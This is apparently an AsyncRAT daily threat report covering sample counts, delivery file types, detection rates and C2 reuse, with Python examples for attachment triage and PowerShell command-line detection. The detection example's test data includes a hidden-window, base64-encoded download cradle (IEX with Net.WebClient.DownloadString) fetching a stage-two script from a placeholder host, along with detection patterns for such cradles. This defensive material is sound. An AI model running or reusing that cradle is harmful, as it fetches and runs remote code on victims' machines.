AsyncRAT - Daily Threat Report

Monday, May 4, 2026

Daily Summary

AsyncRAT activity surged on 2026-05-04 with 60 new samples detected, a 40% increase over the 7-day average of 43. This marks a notable upward trend, driven by a shift toward executable-based delivery.

New Samples Detected

The 60 new samples are heavily dominated by .exe files (43), accounting for 72% of the batch. Supporting file types include .ps1 (8), .bat (4), .zip (2), .rar (1), .js (1), and .dll (1). The presence of PowerShell and BAT scripts alongside executables suggests a multi-stage execution chain (script first, executable payload second), while the single DLL is consistent with DLL sideloading, although one sample is too little to confirm that. No new packing or naming anomalies were observed compared to recent weeks.

Distribution Methods

Distribution is inferred from file types only: the data sources record samples and indicators, not the lure that carried them. The mix of executable loaders (43 .exe), PowerShell and BAT scripts acting as secondary payload downloaders, a JavaScript dropper and compressed archives (.zip, .rar) is consistent with phishing email attachments, where an archive or script runs first and then fetches or drops the executable. This matches the common AsyncRAT campaign pattern of initial access through socially engineered file drops, but the sample set alone does not establish which campaigns or lures were involved.
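A check a mail gateway or triage script can apply to the archive attachments mentioned above, written for this report as an added example (not code from the page or from abuse.ch): it opens a .zip, flags members with executable or double extensions, sniffs for a PE "MZ" header so a renamed executable is caught regardless of its name, and reports encrypted members it cannot inspect. The extension set, the sample archive and its fake PE bytes are constructed for the example. .rar is not covered because the standard library cannot read it.

```python
import io
import os
import zipfile

# Extensions Windows runs directly from a double-click. This set is chosen
# for the example; tune it to local policy.
EXECUTABLE_EXTS = {
    ".exe", ".dll", ".scr", ".com", ".pif", ".bat", ".cmd", ".ps1",
    ".js", ".jse", ".vbs", ".vbe", ".wsf", ".hta", ".lnk",
}


def inspect_zip_attachment(data: bytes) -> list:
    """Return one finding per archive member that should be blocked or detonated.

    Reasons recorded: an executable extension, a double extension such as
    invoice.pdf.exe, a PE header regardless of the name, or an encrypted
    member whose content cannot be inspected at all.
    """
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            basename = os.path.basename(info.filename)
            ext = os.path.splitext(basename)[1].lower()
            reasons = []
            if ext in EXECUTABLE_EXTS:
                reasons.append(f"executable extension {ext}")
                if basename.count(".") >= 2:
                    reasons.append("double extension disguises the file type")
            if info.flag_bits & 0x1:
                # Bit 0 of the general purpose flags marks a password-protected
                # member: content sniffing is impossible, so hold it for
                # sandbox detonation or review instead of passing it through.
                reasons.append("encrypted member, content not inspectable")
            else:
                with zf.open(info) as member:
                    head = member.read(2)  # only the magic bytes, never the whole file
                if head == b"MZ":
                    reasons.append("PE header (MZ) regardless of extension")
            if reasons:
                findings.append({"name": info.filename, "reasons": reasons})
    return findings


def build_sample_zip() -> bytes:
    """Constructed sample attachment (not a real sample): a fake PE with a
    double extension, a renamed fake PE, and a harmless text file."""
    fake_pe = b"MZ\x90\x00" + b"\x00" * 60  # DOS header magic only, not a real binary
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("invoice.pdf.exe", fake_pe)
        zf.writestr("readme.pdf", fake_pe)
        zf.writestr("notes.txt", b"quarterly numbers attached\n")
    return buf.getvalue()


if __name__ == "__main__":
    for finding in inspect_zip_attachment(build_sample_zip()):
        print(finding["name"], "->", "; ".join(finding["reasons"]))
```

The MZ sniff is the part that matters: extension checks alone are defeated by renaming, and an encrypted archive defeats both, which is why the encrypted case is reported as a finding rather than silently skipped.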

Detection Rate

Across representative samples, major AV engines flag roughly 75-80% of current samples as malicious; the DLL and obfuscated .ps1 variants are the most likely to slip past signature-based detection. Security teams should prioritize behavioral detection (process creation, PowerShell script block logging, outbound beaconing) over static scanning for these variants.

C2 Infrastructure

No new C2 servers were reported today, which points to reuse of existing infrastructure. Note that this reflects indicators submitted to the data sources, not necessarily the operator's real footprint: new C2 may simply not have been reported yet. If the low churn holds, it suggests a targeted or resource-constrained operator focused on maintaining stealth rather than expanding.

7-Day Trend

Today’s sample count (60) is the highest in the 7-day window, surpassing the average by 40%. Activity has been steadily rising over the past three days, reversing the calm earlier in the week.

Security Analysis

The absence of new C2 servers combined with the spike in .exe-heavy samples suggests a shift from mass distribution to focused campaigns using previously established infrastructure. This may reflect operators testing new delivery pipelines without expanding their footprint, or simply a reporting lag on new infrastructure. Recommendation: deploy endpoint detection rules for abnormal PowerShell execution (e.g., -EncodedCommand arguments that decode to Invoke-Expression or a download cradle, hidden window style, execution policy bypass) and block or detonate executables arriving from untrusted email origins, including executables nested inside .zip and .rar attachments.
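The PowerShell rule recommended above, worked through as an added example (not the page's own detection content or any vendor's rule): it takes process-creation command lines, decodes any -EncodedCommand argument (PowerShell accepts prefix abbreviations such as -e, -ec and -enc, and the payload is UTF-16LE base64), scans both the visible command line and the decoded script for Invoke-Expression/IEX, inline FromBase64String decoding, download cradles, a hidden window and an execution policy bypass, and scores the result. The indicator weights, the alert threshold and the sample command lines are all constructed for this example; an admin's plain "-ExecutionPolicy Bypass -File" run scores below the threshold on purpose.

```python
import base64
import binascii
import re

# -EncodedCommand and its PowerShell prefix abbreviations (-e, -ec, -en, -enc, ...)
# followed by a base64 argument.
ENCODED_FLAG_RE = re.compile(
    r"(?i)(?:^|\s)[-/]e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{16,})"
)

# Indicator name -> (pattern, weight). Weights and threshold are an
# illustrative choice for this example, not a vendor scoring scheme.
INDICATORS = {
    "invoke_expression": (re.compile(r"(?i)\b(?:invoke-expression|iex)\b"), 2),
    "inline_base64_decode": (re.compile(r"(?i)frombase64string"), 2),
    "download_cradle": (re.compile(
        r"(?i)downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient|start-bitstransfer"), 2),
    "hidden_window": (re.compile(r"(?i)[-/]w[a-z]*\s+hidden"), 1),
    "execution_policy_bypass": (re.compile(r"(?i)[-/]e[a-z]*\s+bypass"), 1),
}
ALERT_THRESHOLD = 3


def decode_encoded_command(cmdline):
    """Return the script behind -EncodedCommand, or None if absent or undecodable."""
    match = ENCODED_FLAG_RE.search(cmdline)
    if not match:
        return None
    try:
        raw = base64.b64decode(match.group(1), validate=True)
    except (binascii.Error, ValueError):
        return None
    # PowerShell expects UTF-16LE here; errors="replace" keeps the indicator
    # scan working if the payload was mangled to break decoders.
    return raw.decode("utf-16le", errors="replace")


def analyze(cmdline):
    """Score one process-creation command line (Sysmon Event ID 1 / Security 4688 style)."""
    findings, score = [], 0
    match = ENCODED_FLAG_RE.search(cmdline)
    decoded = decode_encoded_command(cmdline)
    # Drop the base64 blob from the text we scan so its random letters cannot
    # produce false indicator hits; the decoded script is scanned separately.
    visible = cmdline if match is None else cmdline.replace(match.group(1), "<base64>")
    if decoded is not None:
        findings.append("encoded_command")
        score += 2
    for where, text in (("cmdline", visible), ("decoded", decoded or "")):
        for name, (pattern, weight) in INDICATORS.items():
            if pattern.search(text):
                findings.append(f"{name}@{where}")
                score += weight
    return {"cmdline": cmdline, "decoded": decoded, "findings": findings,
            "score": score, "alert": score >= ALERT_THRESHOLD}


def _b64_utf16le(script):
    """Encode a script the way `powershell -EncodedCommand` expects it."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


# Constructed command lines for the example; not captured telemetry.
SAMPLE_CMDLINES = [
    r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1",
    "powershell.exe -EncodedCommand "
    + _b64_utf16le("Get-Service | Where-Object Status -eq Running"),
    "powershell.exe -w hidden -nop -enc "
    + _b64_utf16le("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')"),
    "powershell.exe -c \"IEX([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('"
    + base64.b64encode(b"Start-Process calc.exe").decode("ascii") + "')))\"",
    "cmd.exe /c echo hello",
]


if __name__ == "__main__":
    for result in map(analyze, SAMPLE_CMDLINES):
        flag = "ALERT" if result["alert"] else "ok   "
        print(f"{flag} score={result['score']} {result['findings']} :: {result['cmdline'][:70]}")
```

Decoding the encoded argument is the step that cannot be skipped: the hidden-window plus encoded-command line carries its download cradle only inside the base64, and a rule that pattern-matches the raw command line never sees it. Script block logging (Event ID 4104) gives the same visibility from the other side, after PowerShell has unwrapped every layer.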

Further Reading

Data Sources

MalwareBazaar (abuse.ch)
ThreatFox (abuse.ch)
URLhaus (abuse.ch)
